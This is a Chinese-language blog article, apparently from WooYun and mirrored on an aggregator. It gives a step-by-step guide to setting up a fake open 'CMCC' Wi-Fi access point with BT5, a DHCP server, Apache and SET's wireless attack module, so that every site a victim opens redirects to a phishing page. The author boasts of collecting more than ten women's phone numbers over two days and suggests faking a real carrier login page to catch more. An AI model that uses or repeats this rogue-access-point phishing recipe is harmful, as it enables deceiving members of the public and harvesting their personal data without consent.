10

如何用意念获取附近美女的手机号码 | WooYun知识库

 6 years ago
source link:
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
neoserver,ios ssh client

如何用意念获取附近美女的手机号码

0x00 背景


那是一个漆黑的夜晚,北风凛凛,我和我的小伙伴们结伴走在回家的路上。下面……没有了,哈哈……我是标题党!

言归正传,我和我的小伙伴们住的地方离某知名艺术大学比较近,某天晚上下班回家,在开门的时候碰到几位美女,发现她们住在我们对面,使我们这群IT基友们甚是激动。巴不得凑上去对美女说一句“我是修电脑的,你家电脑慢不慢,我免费帮你弄下?”。

YY归YY,但我们这群搞IT的都是比较内敛的,怎么好意思主动搭讪,因为我们都是有身份证的人。回到屋里很不淡定,苦思冥想好几分钟;“我们不好意思问她们要,为什么不让他们主动给我们呢?”

0x01 准备


我们附近没有CMCC信号,我们就想搭建一个免费的CMCC,让她们主动来输入手机号认证,岂不更好,下面是实施计划。

2013090819053783681.jpg

准备:无线网卡(8137)、bt5、钓鱼页面

一:插入无线网卡进入BT5,把网卡启动起来,给eth0配个ip

#ifconfig eth0 up 
#ifconfig wlan0 up 
#ifconfig eht0 192.168.10.2/24 

2013090819074528998.jpg

二:下面要安装dhcp和配置

#apt-get install dhcp3-server

2013090819081424128.jpg

# vi /etc/default/dhcp3-server

INTERFACES="eth0" 修改为 INTERFACES="at0"

2013090819093997661.jpg

# vi /etc/dhcp3/dhcpd.conf

把下面贴进去,或者改成自己想要分的网段。

default-lease-time 600; 
max-lease-time 7200; 
option subnet-mask 255.255.255.0; 
option broadcast-address 192.168.10.255; 
option routers 192.168.10.2; 
option domain-name-servers 192.168.10.1; 
option domain-name "www.metasploit.cn"; 
subnet 192.168.10.0 netmask 255.255.255.0 { 
range 192.168.10.10 192.168.10.100; 
} 

如图

2013090819102545091.jpg

三:启动apache和配置钓鱼页面

# /etc/init.d/apache2 start 
# cd /var/www/    //进入网站目录,bt5里apache默认首页是index.html 
#vi index.html    //修改成自己的钓鱼页面,这里为了演示,我插入基础钓鱼 

BT5里面我安装的有XSS平台,这里的Ip要注意,要和刚才我们在dhcp配置文件里面分配的ip段同网段,否则别人连接进来,访问不了的;

当然如果你直接伪造成移动CMCC页面也行!

2013090819110030478.jpg

四:准备的差不多了,神器该派出来了

# cd /pentest/exploits/set/ 
# ./set

这里选择第一个set>1

1)  Social-Engineering Attacks

2013090819113210713.jpg

下一步

这里选择第一个set>8

8) WirelessAccess Point Attack Vector

2013090819115743190.jpg

下一步

set:wireless>1 //选择1 启动

2013090819122771172.jpg

会提示让你编辑dhcp3-server这个文件。按Ctrl+x 直接退出就可以,因为之前我们编辑过了。

下一步

选择分配的Ip段

set:wireless>2

Enter the wireless network interface (ex. wlan0):wlan0 //选择wlan0

2013090819125527463.jpg

(忘记说一个,# vi /pentest/exploits/set/config/set_config.py 更改为自己想要的AP名字,我这里改成CMCC)

下面是效果

2013090819133492348.jpg

连接AP不用输入密码

打开任意网站都会跳到我的钓鱼页面

2013090819140773680.jpg

手机UC登陆效果

2013090819143770651.jpg

2013090819145114971.jpg

总结:

钓了2天,钓到10多个“美女”手机号码,效果还是不错,如果伪造成cmcc登陆页面,效果会更好! (仅限技术研究,切勿用于法非用途!!!后果自负)


About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK